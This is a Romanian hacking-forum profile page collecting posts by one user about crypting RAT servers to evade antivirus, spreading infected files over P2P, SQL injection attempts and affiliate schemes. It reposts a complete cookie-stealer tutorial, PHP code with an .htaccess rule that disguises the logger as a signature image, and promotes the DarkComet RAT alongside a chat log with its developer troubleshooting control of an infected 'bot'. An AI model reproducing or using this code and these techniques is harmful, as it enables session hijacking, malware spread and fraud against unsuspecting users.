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Everything posted by Paul4games
Da ar fi foarte bine daca ar exista un asemenea tutorial,acuma poti sa il faci in romana dar in engleza ar avea cu mult mai mult succes pe forumurile straine....
Un hacker român a fraudat eBay cu trei milioane de dolari .
Paul4games replied to Andblood's topic in Stiri securitate
Toti trebuie sa mancam o paine fie ea castigata cinstit sau necinstit..... -
DAca scanezi pe scan4you.net aia sigur nu trimit dar e pe $$$
Pun cu MySql CHAR() si am incercat si cu @@version dar asta se intampla doar cand pun -inainte de id daca nu pun nu imi apare nimic iar daca nu pun cu CHAR sau intre ghilimele imi da eroare:|......si a zis ca nu blind
Asta cica este doar pentru l33t si ubb3r dar eu o postez si aici,daca nu ar fi teapa te-ai imbogati cu asta(acum este in beta inregistrativati si vedem ce o fi)
Cu acea optioune bifata distribuie .....
Lol e sursa man chiar daca a i fi backdoor ai putea sa o modifici....
Begood bani i cam merita....
Da novirusthanks trimit exemplele anti-virusilor dupa 2 saptamani(sunt 100% sigur deoarece eu tot timpul aveam un stub FUD imi cryptam serverul de rat si il scanam pe nvt ,toate bune si frumoase iar azi cum ar veni era FUD iar maine dintr-o data era detectat de 2-3 anti-virusi ca din senin,cam la 2 saptamani trimit ,mie mi s-a intamplat chestia asta de vreo 4-5 ori...)
Mda nush ce plm are cand execut version() in loc sa imi apara versiuena imi apare "version()", la fel,mai incerc mai tarziu ca acum nu mai am chef
Before you even waste your time Reading this you need basic knowlwge of PHP images using .htaccess RewriteEngine mod. YOUR HOST MUST SUPPORT YOU EDITING THE HTACCESS FILE OR THIS WONT WORK!!! FREE HOSTS USUALLY DONT LET YOU SO GOOGLE IT! We start buy making the actual logger the PHP file that will do our dirtywork behind the scenes. grabber.php <?php putenv("TZ=Europe/Oslo"); $ipLog="cookies.html"; $ip = $_SERVER['REMOTE_ADDR']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS \of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); $port = $_SERVER['REMOTE_PORT']; $cookie = $HTTP_GET_VARS["c"]; fputs($log, " <p>--</p> <b> Host:</b><i> $host </i><br> <b> Port:</b> $port <br> <b> Cookies:</b><font size='2'> $cookie </font><br> <b> User-Agent:</b> $user_agent <br> <b> Referer:</b> <a href='$referer'><font size='2' color='gray'>$referer</font></a> <br> <b> IP:</b> <a href='http://$ip'><font size='2' color='gray'>$ip</font></a> - <a href='http://www.dnsstuff.com/tools/ipall.ch?ip=$ip&src=ShowIP'><font size='2' color='gray'>DNS-Ping</font></a><br> <b> Date:</b> $date "); ?> cookies.html Cookies __ .htaccess RewriteEngine on RewriteRule ^sig.png$ grabber.php once you have all on your server go to a site and use the img tags and use the image linked to the php file so if you used the name i used you would use [\img]yoursite.com/sig.png[\img] take out the slashs those are there so it doesnt use the code, your cookies will apear in the cookies.html like this I AM NOT RESPONSIBLE FOR HOW YOU USE THIS INFORMATION!!!! Autor:Tyler777(cred) Ps:Eu nu sunt autorul acestui articol si nu sunt responsabil cum folositi aceste informatii!
Acum versiunea 1.4 este in beta testing,cand va aparea versiunea va rupe tot daca este adevarat ce am auzit(ca va acvea weinjects pentru firefox:X si va fi polymorphic)
Oare asta ce o fi fumat?
=))Ok astept bugurile pe care le gasesti si sugesti daca ai.....a da si ami intra ma si tu pe amss ca nu te-am mai vazut de nush cand
Spreadingul prin posturile la torente nu este asa tare,cel mai bun este spreadingul prin exploit packuri....
Exact asa fac si eu:))
Full topic:Unremote Security DarkComet-RAT 2.2 Cateva cuvinte scrise de autor: "DarkComet Remote Administration Tool 2.2 is now release ! In this version i decide to clean the whole code , remove all kind of redundancy that permit me to find many bugs , then this version is of course weight more stable than previous release and more secured. All data transfer are now streamed , that mean no more cache folder now all transfer occurred in the streams and his saved ONLY if the transfer was normally finished. That mean no more exploit can be done in this version it is now full secured for the user." Download link:DarkComet-RAT v2.0 Ps: Daca remote dektop connection/system functions sunt incete este din cauza ca bot-ul are un internet slab/ping mare/calculator slab sau voi aveti un calcualtor slab/internet slab....a da si mai poate fi din cauza ca nu folositi un router(azi am testat cu darkcoder acest lucru si daca nu ai un router a zis ca dureaza mai mult sa creeze un thearead nou pentru ca nu se foloseste de nici un component sau ceva,da pe cybergate windows list si astea apar instant deoarece jonyk se foloseste de componentele indy care fac serverul mai instabil.....darkcoder foloseste API-URI PURE ,oricum a zis ca incearca sa fixeze aceasta problema chiar daca nu este de la darkcomet...) Conversatia mea cu darkcomet de azi-dimineata de unde puteti intelege mai bine cum sta treaba cu astea(a si faza cu strong dc++ iara va manca din banda si va incetineste conexiunea cand aveti multe huburi deschise): darkcodersc@synsecurity.net (9/20/2010 2:46:43 PM): hum maybe your computer darkcodersc@synsecurity.net (9/20/2010 2:46:49 PM): or yourconnection is slow darkcodersc@synsecurity.net (9/20/2010 2:46:49 PM): the ping darkcodersc@synsecurity.net (9/20/2010 2:46:53 PM): mean the server speed darkcodersc@synsecurity.net (9/20/2010 2:46:55 PM): not client ##Cool&Boy**Paul** (9/20/2010 2:46:58 PM): nop my internet its fast ##Cool&Boy**Paul** (9/20/2010 2:47:03 PM): i download whit 10 mg/s darkcodersc@synsecurity.net (9/20/2010 2:47:27 PM): then ites strange ##Cool&Boy**Paul** (9/20/2010 2:47:31 PM): if you want darkcodersc@synsecurity.net (9/20/2010 2:47:35 PM): your actually the own to get this prob ##Cool&Boy**Paul** (9/20/2010 2:47:37 PM): come and see via team viewer darkcodersc@synsecurity.net (9/20/2010 2:47:48 PM): :/ darkcodersc@synsecurity.net (9/20/2010 2:47:54 PM): ok ##Cool&Boy**Paul** (9/20/2010 2:48:53 PM): 134 865 748 ##Cool&Boy**Paul** (9/20/2010 2:48:55 PM): 4413 ##Cool&Boy**Paul** (9/20/2010 2:49:31 PM): now its working darkcodersc@synsecurity.net (9/20/2010 2:50:07 PM): wait darkcodersc@synsecurity.net (9/20/2010 2:50:10 PM): don't move darkcodersc@synsecurity.net (9/20/2010 2:50:11 PM): please darkcodersc@synsecurity.net (9/20/2010 2:50:56 PM): wow darkcodersc@synsecurity.net (9/20/2010 2:51:05 PM): it takes a large time ##Cool&Boy**Paul** (9/20/2010 2:51:03 PM): what? darkcodersc@synsecurity.net (9/20/2010 2:51:07 PM): for thum b darkcodersc@synsecurity.net (9/20/2010 2:51:10 PM): thats weird ##Cool&Boy**Paul** (9/20/2010 2:51:09 PM): yes ... ##Cool&Boy**Paul** (9/20/2010 2:52:19 PM): in the previous version i didnt had this problem... ##Cool&Boy**Paul** (9/20/2010 2:52:23 PM): whit thumbails darkcodersc@synsecurity.net (9/20/2010 2:53:21 PM): its maybe a prob with your ram darkcodersc@synsecurity.net (9/20/2010 2:53:25 PM): how many ram you got ##Cool&Boy**Paul** (9/20/2010 2:53:31 PM): 2 gb darkcodersc@synsecurity.net (9/20/2010 2:53:42 PM): your computer is slow ? ##Cool&Boy**Paul** (9/20/2010 2:53:49 PM): how slow? ##Cool&Boy**Paul** (9/20/2010 2:53:52 PM): its working good ##Cool&Boy**Paul** (9/20/2010 2:53:59 PM): maybe its because of strong dc ##Cool&Boy**Paul** (9/20/2010 2:54:19 PM): strong dc++ use alot of bandwith ##Cool&Boy**Paul** (9/20/2010 2:54:32 PM): yeap ##Cool&Boy**Paul** (9/20/2010 2:54:33 PM): you see darkcodersc@synsecurity.net (9/20/2010 2:54:55 PM): i also get your msn message 5 sec later ##Cool&Boy**Paul** (9/20/2010 2:55:12 PM): yes it think its because of strong sc ##Cool&Boy**Paul** (9/20/2010 2:55:20 PM): io have like 95 connections on it... ##Cool&Boy**Paul** (9/20/2010 2:55:27 PM): they are named hubs ##Cool&Boy**Paul** (9/20/2010 2:55:31 PM): and use alot of bandwhith ##Cool&Boy**Paul** (9/20/2010 2:55:36 PM): its a p2p client darkcodersc@synsecurity.net (9/20/2010 2:55:46 PM): ok darkcodersc@synsecurity.net (9/20/2010 2:55:52 PM): did you try with other computer darkcodersc@synsecurity.net (9/20/2010 2:55:55 PM): if it work better darkcodersc@synsecurity.net (9/20/2010 2:56:03 PM): or by shuting down all kind of network stuff ##Cool&Boy**Paul** (9/20/2010 2:56:05 PM): no id ont have any othe computer ##Cool&Boy**Paul** (9/20/2010 2:56:14 PM): the only way its to try on a friends pc... ##Cool&Boy**Paul** (9/20/2010 2:56:19 PM): via team viewer darkcodersc@synsecurity.net (9/20/2010 2:56:30 PM): wait ##Cool&Boy**Paul** (9/20/2010 2:56:30 PM): but look you see the startups doesnt come up... darkcodersc@synsecurity.net (9/20/2010 2:56:32 PM): i got an idea darkcodersc@synsecurity.net (9/20/2010 2:56:35 PM): to see darkcodersc@synsecurity.net (9/20/2010 2:56:38 PM): if it is your network darkcodersc@synsecurity.net (9/20/2010 2:56:39 PM): or computer darkcodersc@synsecurity.net (9/20/2010 2:56:40 PM): wait darkcodersc@synsecurity.net (9/20/2010 2:58:46 PM): ok darkcodersc@synsecurity.net (9/20/2010 2:58:48 PM): i understand a little darkcodersc@synsecurity.net (9/20/2010 2:58:51 PM): what happening darkcodersc@synsecurity.net (9/20/2010 2:58:56 PM): its your router darkcodersc@synsecurity.net (9/20/2010 2:58:58 PM): or a firewall darkcodersc@synsecurity.net (9/20/2010 2:59:01 PM): somthing darkcodersc@synsecurity.net (9/20/2010 2:59:04 PM): checking all connection ##Cool&Boy**Paul** (9/20/2010 2:59:06 PM): i dont have any router/firewall darkcodersc@synsecurity.net (9/20/2010 2:59:10 PM): and freeze it a little ##Cool&Boy**Paul** (9/20/2010 2:59:09 PM): no av nothing darkcodersc@synsecurity.net (9/20/2010 2:59:12 PM): before starting darkcodersc@synsecurity.net (9/20/2010 2:59:19 PM): you don't have router ? ##Cool&Boy**Paul** (9/20/2010 2:59:28 PM): yes i dont ahve ##Cool&Boy**Paul** (9/20/2010 2:59:35 PM): in my contry we dont need any router ##Cool&Boy**Paul** (9/20/2010 2:59:39 PM): or things like this... darkcodersc@synsecurity.net (9/20/2010 2:59:41 PM): is it the same with some other rats ? ##Cool&Boy**Paul** (9/20/2010 2:59:47 PM): the same what? darkcodersc@synsecurity.net (9/20/2010 2:59:53 PM): same slow darkcodersc@synsecurity.net (9/20/2010 2:59:58 PM): need to wait a while ##Cool&Boy**Paul** (9/20/2010 2:59:57 PM): i dont know ##Cool&Boy**Paul** (9/20/2010 2:59:59 PM): lets test it ##Cool&Boy**Paul** (9/20/2010 3:01:23 PM): look ##Cool&Boy**Paul** (9/20/2010 3:01:28 PM): i like it ##Cool&Boy**Paul** (9/20/2010 3:01:39 PM): i think that you can steal some ideas from this ftp client darkcodersc@synsecurity.net (9/20/2010 3:02:04 PM): yes darkcodersc@synsecurity.net (9/20/2010 3:02:10 PM): is it the same then darkcodersc@synsecurity.net (9/20/2010 3:02:16 PM): same prob darkcodersc@synsecurity.net (9/20/2010 3:02:20 PM): with cybergate or another rat darkcodersc@synsecurity.net (9/20/2010 3:02:21 PM): ? ##Cool&Boy**Paul** (9/20/2010 3:02:27 PM): i dont know ##Cool&Boy**Paul** (9/20/2010 3:02:29 PM): lets test it darkcodersc@synsecurity.net (9/20/2010 3:02:31 PM): can you test ##Cool&Boy**Paul** (9/20/2010 3:03:03 PM): lol darkcodersc@synsecurity.net (9/20/2010 3:03:07 PM): don't move please ##Cool&Boy**Paul** (9/20/2010 3:04:16 PM): yes i forget ##Cool&Boy**Paul** (9/20/2010 3:04:32 PM): whit network tools i have the same problem on darkcomet ##Cool&Boy**Paul** (9/20/2010 3:04:40 PM): you see here is all working fast ##Cool&Boy**Paul** (9/20/2010 3:04:43 PM): its not my pc... darkcodersc@synsecurity.net (9/20/2010 3:05:10 PM): i think its your network gateway darkcodersc@synsecurity.net (9/20/2010 3:05:13 PM): let me explain you ##Cool&Boy**Paul** (9/20/2010 3:05:13 PM): same bot look darkcodersc@synsecurity.net (9/20/2010 3:05:21 PM): it seems that create a new thread darkcodersc@synsecurity.net (9/20/2010 3:05:32 PM): is really long for your computer / or create a new connection thread darkcodersc@synsecurity.net (9/20/2010 3:05:36 PM): lets do a simple test ##Cool&Boy**Paul** (9/20/2010 3:05:42 PM): ok darkcodersc@synsecurity.net (9/20/2010 3:05:59 PM): have you see darkcodersc@synsecurity.net (9/20/2010 3:06:03 PM): it was instant darkcodersc@synsecurity.net (9/20/2010 3:06:08 PM): you know why darkcodersc@synsecurity.net (9/20/2010 3:06:08 PM): ? darkcodersc@synsecurity.net (9/20/2010 3:06:13 PM): wait ##Cool&Boy**Paul** (9/20/2010 3:06:13 PM): its local? darkcodersc@synsecurity.net (9/20/2010 3:06:17 PM): let me test somthing else darkcodersc@synsecurity.net (9/20/2010 3:06:48 PM): the same quantity but 10 times more slow darkcodersc@synsecurity.net (9/20/2010 3:06:52 PM): i got the explication darkcodersc@synsecurity.net (9/20/2010 3:06:59 PM): each time darkcodersc@synsecurity.net (9/20/2010 3:07:06 PM): i want to create a new socket connection (thread) darkcodersc@synsecurity.net (9/20/2010 3:07:08 PM): it take a while darkcodersc@synsecurity.net (9/20/2010 3:07:17 PM): its not cause of network speed darkcodersc@synsecurity.net (9/20/2010 3:07:22 PM): its caused by the multi socket thread darkcodersc@synsecurity.net (9/20/2010 3:07:29 PM): so its your network service ##Cool&Boy**Paul** (9/20/2010 3:07:30 PM): yes i understand darkcodersc@synsecurity.net (9/20/2010 3:07:35 PM): maybe because you don't have router darkcodersc@synsecurity.net (9/20/2010 3:07:38 PM): i don't really know darkcodersc@synsecurity.net (9/20/2010 3:07:44 PM): my rat work totally diferently darkcodersc@synsecurity.net (9/20/2010 3:07:46 PM): than others darkcodersc@synsecurity.net (9/20/2010 3:07:49 PM): cybergate darkcodersc@synsecurity.net (9/20/2010 3:07:52 PM): use only one thread ##Cool&Boy**Paul** (9/20/2010 3:07:51 PM): ok but cybergate doesnt do the same thing? darkcodersc@synsecurity.net (9/20/2010 3:07:55 PM): it is components ##Cool&Boy**Paul** (9/20/2010 3:07:57 PM): or its doing onj another way? darkcodersc@synsecurity.net (9/20/2010 3:07:59 PM): not pure API darkcodersc@synsecurity.net (9/20/2010 3:08:08 PM): he use Indy components that handle all of this darkcodersc@synsecurity.net (9/20/2010 3:08:09 PM): me not ##Cool&Boy**Paul** (9/20/2010 3:08:18 PM): anyway on cybergate the remote desktop capture doesnt really good darkcodersc@synsecurity.net (9/20/2010 3:08:20 PM): i use pure thread API and socket API darkcodersc@synsecurity.net (9/20/2010 3:08:23 PM): then i manage all darkcodersc@synsecurity.net (9/20/2010 3:08:29 PM): wait darkcodersc@synsecurity.net (9/20/2010 3:08:31 PM): a last test is darkcodersc@synsecurity.net (9/20/2010 3:08:38 PM): you will see that remote capture will start late darkcodersc@synsecurity.net (9/20/2010 3:08:39 PM): but ##Cool&Boy**Paul** (9/20/2010 3:08:39 PM): yes iive heard about indy components darkcodersc@synsecurity.net (9/20/2010 3:08:41 PM): after starting darkcodersc@synsecurity.net (9/20/2010 3:08:46 PM): it will refresh very speedly darkcodersc@synsecurity.net (9/20/2010 3:08:47 PM): look darkcodersc@synsecurity.net (9/20/2010 3:10:15 PM): hum wait darkcodersc@synsecurity.net (9/20/2010 3:10:18 PM): let me check a last thing darkcodersc@synsecurity.net (9/20/2010 3:11:04 PM): so ok i know what is the prob darkcodersc@synsecurity.net (9/20/2010 3:11:11 PM): its the thread creation with socket BSD API darkcodersc@synsecurity.net (9/20/2010 3:11:19 PM): maybe cause you don't have router ##Cool&Boy**Paul** (9/20/2010 3:11:31 PM): ok and you cant fix that problem? darkcodersc@synsecurity.net (9/20/2010 3:11:46 PM): i don't think i can ##Cool&Boy**Paul** (9/20/2010 3:11:48 PM): from what i know indy components are not unstable or things like this darkcodersc@synsecurity.net (9/20/2010 3:11:52 PM): i will make some research darkcodersc@synsecurity.net (9/20/2010 3:12:02 PM): yes but me darkcodersc@synsecurity.net (9/20/2010 3:12:05 PM): i don't want to use components darkcodersc@synsecurity.net (9/20/2010 3:12:10 PM): i want to use pure API darkcodersc@synsecurity.net (9/20/2010 3:12:12 PM): in both side darkcodersc@synsecurity.net (9/20/2010 3:12:19 PM): only Socket BSD APi + Win32 thread API darkcodersc@synsecurity.net (9/20/2010 3:12:21 PM): more fast darkcodersc@synsecurity.net (9/20/2010 3:12:23 PM): more stable darkcodersc@synsecurity.net (9/20/2010 3:12:24 PM): better ##Cool&Boy**Paul** (9/20/2010 3:12:26 PM): why the components slow down the program or what? darkcodersc@synsecurity.net (9/20/2010 3:12:32 PM): in my computer it is instant darkcodersc@synsecurity.net (9/20/2010 3:12:38 PM): can't said ouf its already there darkcodersc@synsecurity.net (9/20/2010 3:12:48 PM): its better to not use components ##Cool&Boy**Paul** (9/20/2010 3:12:51 PM): i will test on another pc ##Cool&Boy**Paul** (9/20/2010 3:12:57 PM): and i will se the results ^^ ##Cool&Boy**Paul** (9/20/2010 3:13:24 PM): anyway until now i didnt found any bugs or such things darkcodersc@synsecurity.net (9/20/2010 3:13:26 PM): another pc with router darkcodersc@synsecurity.net (9/20/2010 3:13:29 PM): ^^ ##Cool&Boy**Paul** (9/20/2010 3:13:35 PM): just this was my only problem darkcodersc@synsecurity.net (9/20/2010 3:13:44 PM): ok great ##Cool&Boy**Paul** (9/20/2010 3:13:46 PM): sorry in my country people dont use routers darkcodersc@synsecurity.net (9/20/2010 3:13:49 PM): yes darkcodersc@synsecurity.net (9/20/2010 3:13:53 PM): i will try my best ##Cool&Boy**Paul** (9/20/2010 3:13:56 PM): i dont think that i have any friend that have a router darkcodersc@synsecurity.net (9/20/2010 3:13:59 PM): to solve this darkcodersc@synsecurity.net (9/20/2010 3:14:18 PM): but i really think without router , establish a connections takes more time ##Cool&Boy**Paul** (9/20/2010 3:14:16 PM): but i will search for somebody darkcodersc@synsecurity.net (9/20/2010 3:14:19 PM): thats why ##Cool&Boy**Paul** (9/20/2010 3:14:36 PM): i dont know my network connection its fast.. ##Cool&Boy**Paul** (9/20/2010 3:14:42 PM): i download fast/upload fast... ##Cool&Boy**Paul** (9/20/2010 3:14:57 PM): anyway thanks for your time darkcodersc@synsecurity.net (9/20/2010 3:15:20 PM): np , but i know what it is darkcodersc@synsecurity.net (9/20/2010 3:15:23 PM): will try to fix that ##Cool&Boy**Paul** (9/20/2010 3:16:09 PM): ok thanks
Bien ai venit si daca m-ai ai vreun domeniu anunta-ma!
0Nu stiu ce dracu a avut dar mo disperat,sambata sear am incarcat de pe un cont de 6 ori iar duminica seara dupa ce incarcam de pe un cotn a doua oara cand incecam imi dadea eraorea aia la 7 conturi:|
Cosminn zi si mie de unde dezactivezi mesajele alea scrise si ati mai primit vreunul eroare "Rejected by Vavtine:Change failed"?eu am primito aseara de am inebunit si nus tiu de ce cand vream sa incarc a doua oara de pe un cont hopa eroarea aia....
Foloseste prezervativ^^
Daat astea luate cu extractor asa-i?
Pe dc+++ faceam si eu spread acum o luna cu 80k de fisiere infectate la share:))deci no thanks:)
Traficul de US valoreaza cel mai mult asai?
Am inteles dar daca aia isi fac cont pe jasmine dar nu cheltuie bani nu primesc nimic?si am vazu ca trebuie aprobate comisioanele ..